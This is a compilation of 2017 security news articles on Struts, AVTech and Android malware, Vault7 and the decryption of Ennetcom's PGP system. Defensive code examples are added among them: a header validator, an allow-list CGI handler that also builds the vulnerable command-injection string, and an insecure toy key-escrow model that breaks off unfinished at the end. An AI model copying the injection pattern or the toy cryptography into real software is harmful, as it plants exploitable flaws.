Schneider Electric has released patches to address critical and high severity vulnerabilities in its StruxureWare SCADA Expert ClearSCADA and Wonderware Intelligence products, ICS-CERT informed organizations last week.

According to advisories released by both ICS-CERT and Schneider Electric, the ClearSCADA product is affected by a high severity flaw (CVE-2017-6021) that allows an attacker on the network to crash the ClearSCADA server process and communications driver by sending a specially crafted request.

The security hole, discovered by researchers at Kaspersky Lab, affects all supported versions of the SCADA product, including ClearSCADA 2014 R1 (build 75.5210), 2014 R1.1 (build 75.5387), 2015 R1 (build 76.5648) and 2015 R2 (build 77.5882).

Service packs or hotfixes were released for versions 2014 R1.1 (build 75.6239), 2015 R1.1 (build 76.6191) and 2015 R2 (build 77.6181) in December and January. Users of ClearSCADA 2013 R2 and earlier versions have been advised to update to 2015 R2.


A separate advisory describes a critical severity credentials management issue (CVE-2017-5178) affecting the Tableau Server analytics software optionally available in the Wonderware Intelligence solution.

The Tableau Server software includes a default account that is not easy to configure after installation. ICS-CERT said the process of changing the default credentials for Tableau Server is not documented.

The account in question has administrative privileges, allowing an attacker to leverage it to take control of the host machine, the vendor warned.

Schneider has advised all organizations that use Wonderware Intelligence with Tableau Server versions 7.0 through 10.1.3 to update both the Tableau Server and Tableau Client (Desktop) components to version 10.1.4. It’s worth noting that only installations configured for local authentication are affected by the flaw; installations that use Active Directory are not impacted.

These are not the only vulnerabilities patched by Schneider this year. The company has also addressed security holes in homeLYnk, Wonderware Historian, StruxureWare Data Center Expert, and Conext Combox.


Actively Exploited Struts Flaw Affects Cisco Products

13.3.2017 securityweek Exploit

Cisco informed customers on Friday that at least some of its products are affected by an Apache Struts2 command execution vulnerability that has been exploited in the wild in recent days.

The flaw has been confirmed to affect the Cisco Identity Services Engine (ISE), the Prime Service Catalog Virtual Appliance, and the Unified SIP Proxy Software. The networking giant has published a list of dozens of products that are not affected, but there are still many products under investigation.

While the vulnerability has been actively exploited to deliver malware, Cisco has not found any evidence of attacks targeting its products. Nevertheless, the company has warned users that exploits for this flaw are publicly available. It’s worth noting that Cisco’s Talos group was the first to warn of active attacks.

The security hole, identified as CVE-2017-5638, affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10, and it was addressed on March 6 with the release of versions 2.3.32 and 2.5.10.1. The first attacks were spotted one day later when someone published a proof-of-concept (PoC) exploit.

The vulnerability exists in the Jakarta Multipart parser and is caused by the improper handling of Content-Type header values. A remote, unauthenticated attacker can exploit the weakness to execute arbitrary commands by sending a specially crafted HTTP request.

Researchers observed exploitation attempts whose goal was to determine if a system is vulnerable, and ones where attackers attempted to deliver various types of malware, including IRC bouncers and DoS/DDoS bots.

Rapid7 has been monitoring attacks and, based on data from its honeypots, determined that much of the malicious traffic comes from two machines apparently located in China.

Cisco and other security vendors have started releasing firewall rules that should block such attacks. Tinfoil Security has made available an online tool that allows website owners to check if they are vulnerable to attacks exploiting CVE-2017-5638.
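As an added example (not code from Cisco, Talos or Apache), the check below validates the Content-Type header against the RFC 7231 media-type grammar and flags requests that fail it, the kind of rule a reverse proxy or a log review could apply in front of a Struts 2 application; the log-line layout and the sample entries are constructed for this example.

```python
"""Flag requests whose Content-Type header is not a well-formed media type.

Added example, not code from Cisco, Talos or Apache. A Content-Type value that
fails the RFC 7231 media-type grammar has no legitimate use, and is the kind of
request a proxy in front of a Struts 2 application should log or refuse.
The log layout and the sample entries are constructed for this example.
"""
import re
from typing import List, Optional, Tuple

# RFC 7230 tchar set: '%' and '$' are legal here, but '{', '}' and spaces are
# not, so a header value carrying expression-like braces cannot match.
TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]"
TOKEN = rf"{TCHAR}+"
# quoted-string: qdtext or a backslash quoted-pair between double quotes
QUOTED_STRING = r'"(?:[\t \x21\x23-\x5b\x5d-\x7e]|\\[\t \x21-\x7e])*"'
PARAMETER = rf"{TOKEN}=(?:{TOKEN}|{QUOTED_STRING})"
# media-type = type "/" subtype *( OWS ";" OWS parameter )
MEDIA_TYPE = re.compile(rf"{TOKEN}/{TOKEN}(?:[ \t]*;[ \t]*{PARAMETER})*")


def content_type_is_wellformed(value: str) -> bool:
    """True only if the whole value is type/subtype plus optional parameters."""
    return MEDIA_TYPE.fullmatch(value.strip()) is not None


# Constructed proxy log layout: <time> <client> <method> <path> "<content-type>"
# (inner quotes are not escaped in this layout; the greedy group spans them).
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')


def parse_log_line(line: str) -> Optional[Tuple[str, ...]]:
    match = LOG_LINE.match(line.rstrip("\n"))
    return match.groups() if match else None


def scan_log(lines) -> List[dict]:
    """Return one finding per request whose Content-Type fails the grammar."""
    findings = []
    for line in lines:
        parsed = parse_log_line(line)
        if parsed is None:
            continue  # unparsable line; out of scope for this check
        time, client, method, path, ctype = parsed
        if ctype and not content_type_is_wellformed(ctype):
            findings.append({"time": time, "client": client, "method": method,
                             "path": path, "content_type": ctype})
    return findings


# Constructed sample: four benign requests and one malformed header.
SAMPLE_LOG = [
    '2017-03-08T10:15:02Z 198.51.100.7 POST /upload.action "multipart/form-data; boundary=----FormBoundary7MA4YWxk"',
    '2017-03-08T10:15:03Z 198.51.100.7 GET /index.action ""',
    '2017-03-08T10:15:04Z 192.0.2.44 POST /api/items "application/json; charset=utf-8"',
    '2017-03-08T10:15:05Z 192.0.2.44 POST /upload.action "multipart/form-data; boundary="quoted boundary""',
    '2017-03-08T10:15:06Z 203.0.113.9 POST /upload.action "multipart/form-data; %{malformed-marker}"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("malformed Content-Type:", finding)
```

Only the last sample line is reported; the quoted boundary with a space is legal under the grammar and is deliberately included as a false-positive check.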


US regulator takes on bitcoin: new fund barred from the exchange

12.3.2017 Novinky/Bezpečnost BigBrother
The US Securities and Exchange Commission (SEC) this week rejected an application to list the first fund based on the cryptocurrency bitcoin on a US exchange. The value of bitcoin reacted with a steep fall.
Immediately after the decision on Friday, the value of one bitcoin dropped by roughly 18 percent, falling below the 1,000 dollar mark (roughly 25,000 CZK). It subsequently recovered above that level, the Reuters agency wrote.

The twins Tyler and Cameron Winklevoss tried to persuade the commission to allow their bitcoin fund onto the Bats BZX exchange. The commission, however, decided not to permit such a step because of the insufficient regulation of the cryptocurrency.

Bitcoins enjoy great popularity mainly as an investment vehicle. Their exchange rate, however, fluctuates often. The European Banking Authority has therefore even warned consumers that unregulated virtual currencies pose a great risk, since deposits in them are not protected in any way.

The last bitcoin in 2140
The virtual currency bitcoin was created in 2009, but has enjoyed greater popularity only in recent years. It was designed so that no government or central bank could influence it. The digital coins are “minted” by a network of computers running specialized software programmed to release new coins at a steady but ever-decreasing rate. The number of coins in circulation is ultimately to reach 21 million, which is expected around the year 2140.

Tyler and Cameron Winklevoss previously made a name for themselves through a legal dispute with Facebook founder Mark Zuckerberg, whom they accused of stealing their idea for an online social network. The settlement of that lawsuit earned them roughly 65 million dollars.


CIA planned to hack cars

12.3.2017 Novinky/Bezpečnost BigBrother
Anyone can break into a car if they have, say, a brick. More sophisticated systems can already unlock a car remotely, as with a remote control. CIA documents leaked on WikiLeaks showed that the US spy agency planned to break into cars’ software in order to take control of them.
Many people are unsettled by the fact that anyone can get into their computer or phone, use it, monitor it, eavesdrop on it… This is called hacking. According to the documents published on WikiLeaks, the CIA carried out a range of activities in this area. It turns out it also planned to take control of cars remotely.

Files have surfaced in which the CIA assumes that taking control of vehicle systems could have “potential for mission areas”. What does that mean?

Like a remote-controlled toy
Imagine a car with a terrorist speeding away who would vanish into the confusing jungle of the city before the police could catch him. A hacking attack could in effect arrest him. It would lock him in the car and drive it wherever needed, for example to the nearest police patrol.

Is this far-fetched? Back in 2015, Jeep recalled 1.5 million vehicles to service centers after the Wired website showed that hackers (private individuals, not an organized, state-sponsored group) could break into the internal system of a Cherokee while it was moving and take control of it.

The documents on WikiLeaks show that the CIA focused on the QNX system from BlackBerry, which today is part of sixty million vehicles worldwide.


DDoS Malware Targets AVTech CGI Vulnerability

12.3.2017 securityweek Virus
A newly discovered Linux malware family is targeting products from surveillance technology company AVTech via a CGI vulnerability that was disclosed in October 2016, Trend Micro researchers warn.

Detected as ELF_IMEIJ.A, the malware is the latest in a long list of Trojans targeting Linux ARM devices (such as Mirai, Umbreon rootkit, LuaBot, BashLite, and more). Linux has become the platform of choice for many Internet of Things (IoT) devices, and it’s no wonder cybercriminals are focusing on targeting it, as this provides them with a large attack surface.

The newly discovered malware attempts to infect devices from AVTech by exploiting a reported CGI vulnerability residing in CloudSetup.cgi, which is found in all AVTech devices that support the Avtech cloud.

“The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed. Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges,” Search-Lab explains.

The vulnerability was disclosed to AVTech in October 2016, but the vendor has provided no response, despite repeated attempts to contact it, Trend Micro reveals.

The ELF_IMEIJ.A malware is distributed via RFIs in cgi-bin scripts. A specific request is sent to random IP addresses to discover vulnerable devices, and the Trojan is delivered through a command injection that triggers the download. The targeted device, Trend Micro explains, is tricked into fetching the malicious file and changing the file’s permissions to execute it locally.

“The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data. It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself,” the researchers explain.

Given its DDoS capabilities, the malware can be compared to Mirai, but the modus operandi clearly sets the threat apart. The new Trojan targets only AVTech products, uses only port 39999, and infects only devices with unsecured cgi-bin scripts, which allow for successful malware installation.

“AVTech has over 130,000 different devices connected to the Internet, so this attack may be used to gain and maintain persistent access to these devices. The devices can also be turned into bots and used to drive large scale DDoS attacks. Like most connected devices, the targets are not secured by default and are impossible to directly monitor,” Trend Micro says.


ELF_IMEIJ, a new Linux malware is spreading in the wild
12.3.2017 securityaffairs Virus

Security experts from Trend Micro discovered a new family of Linux malware, tracked as ELF_IMEIJ, targeting AVTech surveillance devices.
Security experts from Trend Micro discovered a new family of Linux malware that is targeting products from surveillance technology company AVTech exploiting a CGI vulnerability that was disclosed in 2016.

According to Trend Micro, the flaw was reported to AVTech in October 2016, but the vendor has never responded.

“The vulnerability was discovered and reported by Search-Lab, a security research facility, and was disclosed to AVTech on October 2016. However, even after repeated attempts by Search-Lab to contact the vendor there was no response.” reads Trend Micro.

The malicious code, tracked as ELF_IMEIJ.A, attempts to infect AVTech devices by exploiting an authenticated command injection residing in CloudSetup.cgi, a CGI script present in all AVTech devices that support the Avtech cloud.

“Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed.” reads the advisory published by Search-Lab. “Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.”

The ELF_IMEIJ malware is spread via RFIs in cgi-bin scripts. The attackers send a specific request to random IP addresses in the attempt of discovering vulnerable devices. The Trojan is delivered through a command injection that triggers the download of the malicious payload.

The targeted device is tricked into fetching the malicious file, changing the file’s permissions and then executing it locally.

ELF_IMEIJ.A

“The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data.” continues Trend Micro. “It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself.”

The researchers explained that the malware is able to execute shell commands from the malicious actors and also initiate Distributed Denial of Service (DDoS) attacks.

The ELF_IMEIJ Trojan targets only AVTech products, and it uses port 39999 to infect only devices with unsecured cgi-bin scripts.

Below is a table comparing the Mirai malware with ELF_IMEIJ.A.

                   MIRAI                                      IMEIJ
Affected devices   Various                                    AVTech
Used ports         7547, 5555, 48101                          39999
Exploits           Devices with BusyBox software installed,   Devices with unsecured cgi-bin scripts,
                   by brute force                             to install the malware ELF_IMEIJ.A

“AVTech has over 130,000 different devices connected to the Internet, so this attack may be used to gain and maintain persistent access to these devices.” continues the analysis from Trend Micro. “The devices can also be turned into bots and used to drive large scale DDoS attacks. Like most connected devices, the targets are not secured by default and are impossible to directly monitor.”

The discovery of the ELF_IMEIJ.A trojan shows the increasing interest of threat actors in targeting Linux devices.
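As an added example serving both this article and the previous one (not AVTech’s code), the handler below shows the allow-list check that Search-Lab says CloudSetup.cgi lacks: the exefile parameter only selects a named action from a fixed table and never reaches a shell. The action names, their commands and the /var/run path are constructed for this example.

```python
"""Allow-list dispatch for a CGI 'exefile' parameter.

Added example, not AVTech's code. It contrasts the flaw described by
Search-Lab (the request parameter is the command) with a handler in which the
parameter is only a key into a fixed table of argv vectors, so no client text
can ever reach a shell. Action names, commands and the /var/run path are
constructed for this example.
"""
import re
import shlex
import subprocess
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs

# The only things a client may ask for. Each maps to a fixed argv; nothing
# taken from the request ever becomes part of the command line.
ALLOWED_ACTIONS: Dict[str, List[str]] = {
    "uptime": ["uptime"],
    "disk_usage": ["df", "-h", "/"],
    "cloud_status": ["cat", "/var/run/cloud.status"],  # constructed path
}

ACTION_NAME = re.compile(r"^[a-z_]{1,32}$")


def vulnerable_command_for(query_string: str) -> str:
    """The pattern the advisory describes: the parameter *is* the command line.
    Returned rather than executed here; the flawed CGI hands it to a root shell."""
    exefile = parse_qs(query_string).get("exefile", [""])[0]
    return "sh -c " + shlex.quote(exefile)


def resolve_exefile(query_string: str) -> List[str]:
    """Map the exefile parameter to a fixed argv, or raise ValueError."""
    values = parse_qs(query_string, keep_blank_values=True).get("exefile", [])
    if len(values) != 1:
        raise ValueError("exefile must be supplied exactly once")
    name = values[0]
    # Syntactic check first, so error messages never echo client-supplied text.
    if not ACTION_NAME.match(name):
        raise ValueError("exefile has an invalid form")
    if name not in ALLOWED_ACTIONS:
        raise ValueError("exefile is not an allowed action")
    return list(ALLOWED_ACTIONS[name])  # copy: callers cannot mutate the table


# A runner takes argv and returns (exit status, stdout); injectable for tests.
Runner = Callable[[List[str]], Tuple[int, str]]


def default_runner(argv: List[str]) -> Tuple[int, str]:
    # shell=False: argv goes straight to execve, so shell metacharacters are inert.
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)
    return proc.returncode, proc.stdout


def handle_cloudsetup(query_string: str, runner: Runner = default_runner) -> Tuple[int, str]:
    """Return (HTTP status, body) for a CloudSetup-style request."""
    try:
        argv = resolve_exefile(query_string)
    except ValueError as exc:
        return 400, str(exc)
    status, output = runner(argv)
    if status != 0:
        return 500, "action failed"
    return 200, output


if __name__ == "__main__":
    print(vulnerable_command_for("exefile=uptime%20-p"))  # flaw: client text becomes a command
    print(handle_cloudsetup("exefile=uptime%20-p"))      # hardened: (400, ...)
    print(handle_cloudsetup("exefile=uptime"))           # hardened: runs only the fixed argv
```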


Check Point experts spotted pre-Installed Android Malware on 38 Android devices
12.3.2017 securityaffairs  Android

Experts discovered pre-installed malware on 38 high-end smartphone models belonging to popular manufacturing companies such as Samsung, LG, Xiaomi and Asus.
In the past, security experts have already reported cases of pre-installed malware on mobile devices.

In September 2015, security experts at G-Data security firm discovered new cases of Chinese Android mobile devices infected by pre-installed malware.

In December 2016, experts from Doctor Web spotted new Trojans in the firmware of several dozen low-cost Android smartphones and tablets.

The malicious code allows attackers to control the infected devices: downloading, installing and executing malicious Android apps, accessing data, and dialing premium phone numbers.

The news of the day is that experts at security firm Check Point discovered that at least 38 high-end smartphone models belonging to popular manufacturers such as Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo, distributed by two unidentified companies, have been found with pre-installed malware.

The researchers discovered two distinct families of malware, Loki and SLocker, on the mobile devices distributed by the companies.

According to the experts at CheckPoint, the malicious apps were not included in the official ROM firmware that was supplied by the vendors, but evidently, the supply chain is compromised and the devices are commercialized with pre-installed malware.

“According to the findings, the malware were already present on the devices even before the users received them. The malicious apps were not part of the official ROM supplied by the vendor, and were added somewhere along the supply chain.” reads the blog post published by Check Point researchers.

The experts noticed that in some cases the malicious code was added using system privileges, making the apps hard to remove.

“Six of the malware instances were added by a malicious actor to the device’s ROM using system privileges, meaning they couldn’t be removed by the user and the device had to be re-flashed.” continues the analysis.

The Loki malware implements spyware capabilities, it allows attackers to gain full control on the victims’ devices.

SLocker is mobile ransomware that locks victims’ mobile devices and demands the payment of a ransom to unlock them.

Below is the list of infected mobile devices:

Galaxy Note 2
LG G4
Galaxy S7
Galaxy S4
Galaxy Note 4
Galaxy Note 5
Galaxy Note 8
Xiaomi Mi 4i
Galaxy A5
ZTE x500
Galaxy Note 3
Galaxy Note Edge
Galaxy Tab S2
Galaxy Tab 2
Oppo N3
Vivo X6 plus
Nexus 5
Nexus 5X
Asus Zenfone 2
LenovoS90
OppoR7 plus
Xiaomi Redmi
Lenovo A850
The malware is very difficult to uninstall because the apps are part of the device’s ROM, installed with system privileges.

To remove the malware, users have two options:

Root your device and uninstall the malicious apps.
Flash the firmware/ROM.


Danish-speaking users hit by malware spread via Dropbox links
12.3.2017 securityaffairs Virus

Danish-speaking users were infected by malware spread through Dropbox, but the company quickly adopted the countermeasures to stop the attack.
According to the experts from security firm AppRiver, Danish-speaking users were hit by an unusual malware-based attack.

The attack hit Denmark, Germany, and several surrounding Scandinavian countries on Wednesday morning.


“Early this morning, Denmark, Germany and several surrounding Scandinavian countries were hit with a large volume malware attack. The attack leveraged the legitimate cloud storage service Dropbox to host their malware payloads while attempting to disguise the links with random strings of characters and varying filenames.” reads the analysis shared by AppRiver. “In the past 12 hours, we have quarantined thousands of these messages, which only represents a small percentage of the total message volume.”

Dropbox spam

It is not clear how the threat actors chose the potential targets of the attack, which, I remind you, are Danish-speaking users.
The exploitation of Dropbox by crooks is not a novelty: attackers can send spam messages containing links to cloud storage that point to malicious files, leveraging the fact that there are usually no restrictions on Dropbox traffic.

The researchers noticed that the attackers used a unique link for each malicious message in the campaign; this circumstance suggests the attackers used an automated script to randomly create the Dropbox file shares.

The researchers discovered that the attackers sent out messages claiming to provide shipping details and a fake invoice. The links included in the messages pointed to a .zip archive containing a JavaScript file that carried a Trojan dropper.

“Lately we have seen more email providers tighten restrictions on what type of files can be sent/received as an attachment. In response, malware distributors, who are always looking for a weakness to exploit, have embraced file sharing as an alternative means to distribute those malicious files. We expect this trend to continue throughout the year.” continues the analysis.

Troy Gill, security analyst at AppRiver, explained that Dropbox responded quickly to the attack; after two hours almost all the malicious links had been disabled.

“I would say that after about an hour, we saw a lot of the links disabled,” he said. “After two hours, I was hard pressed to find a link that wasn’t disabled.”

Crooks sent out hundreds of thousands, maybe millions of messages.

How can companies protect themselves from this kind of attack?

Businesses can use spam filters, but a more aggressive approach involves banning emails that embed Dropbox links.

“If you wanted to be aggressive, you could ban inbound Dropbox content links,” he said. “And if you decided that your organization wasn’t going to use it, you could easily make a change to your spam filter or your web filter to block access to Dropbox entirely.”


Beware! Pre-Installed Android Malware Found On 36 High-end Smartphones
11.3.2017 thehackernews Android

Bought a brand new Android Smartphone? Do not expect it to be a clean slate.
At least 36 high-end smartphone models belonging to popular manufacturers such as Samsung, LG, Xiaomi, Asus, Nexus, Oppo, and Lenovo, distributed by two unidentified companies, have been found pre-loaded with malware programs.
These malware infected devices were identified after a Check Point malware scan was performed on Android devices. Two malware families were detected on the infected devices: Loki and SLocker.
According to a blog post published Friday by Check Point researchers, these malicious software apps were not part of the official ROM firmware supplied by the smartphone manufacturers but were installed later somewhere along the supply chain, before the handsets arrived at the two companies from the manufacturer's factory.
First seen in February 2016, the Loki Trojan injects itself into core Android operating system processes to gain powerful root privileges. The Trojan also includes spyware-like features, such as grabbing the list of current applications, browser history, contact list, call history, and location data.
On the other hand, SLocker is mobile ransomware that locks victims’ devices for ransom and communicates through Tor in order to hide the identity of its operators.
List of Popular Smartphones Infected with Malware
Here's the list of infected smartphones:
Galaxy Note 2
LG G4
Galaxy S7
Galaxy S4
Galaxy Note 4
Galaxy Note 5
Galaxy Note 8
Xiaomi Mi 4i
Galaxy A5
ZTE x500
Galaxy Note 3
Galaxy Note Edge
Galaxy Tab S2
Galaxy Tab 2
Oppo N3
Vivo X6 plus
Nexus 5
Nexus 5X
Asus Zenfone 2
LenovoS90
OppoR7 plus
Xiaomi Redmi
Lenovo A850
The malware backdoor offers its operator unrestricted access to these infected devices, from downloading, installing and activating Android malicious apps, deleting user data, uninstalling security software and disabling system apps, to dialing premium phone numbers.
This incident underscores the dangers of untrusted supply chains, and experts are quite worried about the security of the supply chain with reports of over 20 incidents where rogue retailers have managed to pre-install malware on new Android handsets.
Here's How to Remove the Malware Infections:
Since the malware programs were installed to the device's ROM using system privileges, it's hard to get rid of the infections.
To remove the malware from the infected devices, either you can root your device and uninstall the malware apps easily, or you would need to completely reinstall the phone firmware/ROM via a process called "Flashing."
Flashing is a complex process, and it is recommended that users power off their device and approach a certified technician/mobile service provider.
It's not the first time when high-end smartphones have been shipped pre-installed with malicious apps that can covertly siphon sensitive user data.
In December last year, certain low-cost Android smartphones and tablets were found to be shipped with malicious firmware that covertly gathered data about the infected devices, displayed ads on top of running apps and downloaded unwanted APKs onto the victims' devices.
In November, researchers discovered a hidden backdoor in the AdUps firmware of over 700 Million Android smartphones, which also covertly gathered data on phone owners and sent it to a Chinese server without the user's knowledge.
Meanwhile, a flaw in the Ragentek firmware used by certain low-cost Android devices was also discovered that allowed attackers to remotely execute malicious code with root privileges, turning over full control of the devices to hackers.


WikiLeaks is working with software makers on Zero-Days included in the Vault7 dump
11.3.2017 securityaffairs BigBrothers

WikiLeaks announced it is working with software makers on the zero-days by sharing information on the hacking tools included in the Vault7 dump with them.
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).

The Wikileaks dump, called “Vault7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.” reads the announcement issued by WikiLeaks.

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

Now WikiLeaks has decided to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected.

The White House promptly warned that there may be legal repercussions for the organization.

WikiLeaks’ intent is to protect the customers of the major companies whose products are impacted by the hacking tools in the data leak.

WikiLeaks ✔ @wikileaks
Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?
Yes, make people safe
No, they're the problem
Other (see my reply)
6:53 PM - 8 Mar 2017, 52,388 votes
WikiLeaks initially announced it would not release any tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should be analyzed, disarmed and published.”

wikileaks cia data leak

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

The decision was taken by WikiLeaks and its followers through a poll on Twitter about the possibility to share technical details of the hacking tools with the companies in private industry that sell the products targeted by the US intelligence.

“Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

The CIA has refused to comment on the authenticity of the WikiLeaks data leak and remarked that US law doesn’t allow the Government to spy on its citizens.

While I was writing, tech companies are already working to fix the zero-day flaws in their products and to offer customers tools to detect the presence of anomalies in their applications.

Intel Security has released a tool that allows users to check if the firmware of computers contains unauthorized code.

The Advanced Threat Research team at Intel Security developed a new module for its existing CHIPSEC open-source framework to detect rogue EFI binaries. It can be used to detect malicious code from Windows, Linux, macOS, and even from an EFI shell.


Ennetcom – Dutch Police confirmed to have decrypted BlackBerry PGP messages in a criminal case
11.3.2017 securityaffairs Mobil

The Dutch police decrypted a number of PGP messages sent by crooks through their BlackBerry mobile devices for the criminal investigation on Ennetcom.
PGP is an open source end-to-end encryption standard that can be used to sign emails, files, documents, or disk partitions.

In April 2016, the Dutch Police arrested a 36-year-old man on suspicion of money laundering who was also accused of selling ready-to-use PGP BlackBerry phones to criminals.

In April, I reported the news of the seizure of the servers of Ennetcom, the company owned by Danny Manupassa, which contained data related to communications belonging to a large number of criminal groups.

“Police and prosecutors believe that they have captured the largest encrypted network used by organized crime in the Netherlands,” said the prosecutors in an official statement published at the time of the arrest.

The police arrested Mr. Manupassa; the prosecutors suspect he was using his company to manage illegal activities.

Investigations appeared very complicated due to territorial competences, the majority of Ennetcom customers were in the Netherlands, but the company’s servers were in Canada. Prosecutors obtained copies of data on the servers located in Canada with the support of the Toronto police.

Canadian authorities cooperated with their Dutch colleagues, granting access to the company's servers; the extracted information has been used in the investigation against Manupassa.

“The company sold modified telephones for about 1,500 euros each and used its own servers for the encrypted data traffic,” the prosecutors said. “The phones had been modified so that they could not be used to make calls or use the Internet.”


In January 2016, Dutch investigators announced that they could decrypt emails stored on PGP-encrypted BlackBerry devices using commercially available tools. That technique only reaches messages on handsets that are physically in the authorities' possession.

The Dutch police have now confirmed that their investigators decrypted 3.6 million messages stored on the seized server.

The Public Prosecution Service (Openbaar Ministerie) confirmed in a press release that the police decrypted a number of messages even though they were protected with end-to-end encryption.

“The Dutch police and the Public Prosecution Service (OM) had access to 3.6 million encrypted messages within organized crime,” reads the press release. “By decrypting the information, evidence became available for dozens of criminal investigations into assassinations, armed robbery, drug trafficking, money laundering, attempted murder and other organized crime.”

According to the authorities, Ennetcom sold more than 20,000 encrypted BlackBerry phones that came preloaded with a number of security features, including PGP email.

The Dutch authorities discovered that the Ennetcom PGP BlackBerry devices routed customers' communications through a BlackBerry Enterprise Server operated by the company.

“PGP BlackBerry devices are specifically designed to send and receive PGP email messages with other PGP BlackBerry devices. It is recognized that, by their nature, PGP encrypted devices can be used to frustrate the usual methods by which police, and other investigative bodies, intercept communications and identify the communicators. The Dutch authorities say that Ennetcom PGP BlackBerry devices, that they have found in the course of their investigations, have been modified so that they can only send and receive encrypted email. Unusually, these Ennetcom PGP BlackBerry devices cannot send or receive phone calls or conventional text messages, nor can they take pictures. The microphones on the phones have either been removed or disabled. It is also possible for Ennetcom to remotely “wipe” or erase the contents of any of their devices at any time.” a Canadian court filing reads.

“The Dutch authorities also discovered that these Ennetcom PGP BlackBerry devices, because of their modifications, could not be used on conventional cellular telephone networks. Rather, they operate through a system run by Ennetcom that generates anonymous email addresses by which the users of these devices can communicate in complete anonymity. The Ennetcom PGP BlackBerry devices can only operate through a BlackBerry Enterprise Server. BlackBerry Enterprise Server is a software package that permits IT administrators, within an organization, to control virtually all functions of BlackBerry devices connected to the organization’s network. It allows those administrators to make the devices as secure as the organization would like. In this case, the Dutch authorities discovered that the Ennetcom PGP BlackBerry devices were only able to communicate via PGP encrypted e-mail with other Ennetcom PGP BlackBerry devices connected to the same Ennetcom network. The Dutch authorities also discovered that the “keys” for the PGP encryption system were generated by the server, rather than by the device. As a result, the Dutch authorities came to believe that the keys to decrypt the PGP encrypted information, on the Ennetcom PGP BlackBerry devices, are stored on Ennetcom’s BlackBerry Enterprise Servers.”

In short, Ennetcom ran its own BlackBerry Enterprise Servers, and the PGP keys were generated by the company's server rather than on the customers' devices. Ennetcom stored those keys on its servers, and the police found them there. A system in which the provider generates and holds the private keys is not end-to-end encrypted in any meaningful sense: whoever obtains the server's key store, whether by seizure or by compromise, can decrypt every message that passed through it.
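The difference between the two key-provisioning designs, as an added model that is not Ennetcom's, BlackBerry's or the investigators' code: a server that generates and escrows every device's private key versus a server that only stores device-generated public keys, and what a forensic copy of each server yields. The cryptography is a deliberately tiny Diffie-Hellman group with an HMAC-based toy stream cipher, standing in for PGP's hybrid encryption; the group, the server classes and the message are all constructed for illustration and must not be used for anything real.

```python
import hashlib
import hmac
import secrets

# Toy Diffie-Hellman group, for illustration only: far too small for real use.
P = 2**127 - 1
G = 3


def gen_keypair():
    """Return (private, public) for one device."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)


def _keystream(key: bytes, n: int) -> bytes:
    """Toy stream cipher: HMAC-SHA256 in counter mode (not for real use)."""
    out, counter = bytearray(), 0
    while len(out) < n:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:n])


def _derive(shared: int) -> bytes:
    return hashlib.sha256(shared.to_bytes(16, "big")).digest()


def encrypt(recipient_pub: int, plaintext: bytes):
    """Hybrid encryption to the recipient's public key (ElGamal style)."""
    y, ephemeral_pub = gen_keypair()
    key = _derive(pow(recipient_pub, y, P))
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, len(plaintext))))
    return ephemeral_pub, ct


def decrypt(priv: int, message) -> bytes:
    ephemeral_pub, ct = message
    key = _derive(pow(ephemeral_pub, priv, P))
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, len(ct))))


class EscrowServer:
    """Ennetcom-style design: the server generates each device's keypair and
    keeps the private half, so its mail store is readable by anyone who obtains the server."""

    def __init__(self):
        self.private_keys, self.public_keys, self.mailbox = {}, {}, []

    def provision(self, device_id: str) -> int:
        priv, pub = gen_keypair()
        self.private_keys[device_id] = priv      # the escrow the investigators found
        self.public_keys[device_id] = pub
        return pub

    def relay(self, to: str, message):
        self.mailbox.append((to, message))


class DirectoryServer:
    """Device-generated keys: the server only ever sees public keys."""

    def __init__(self):
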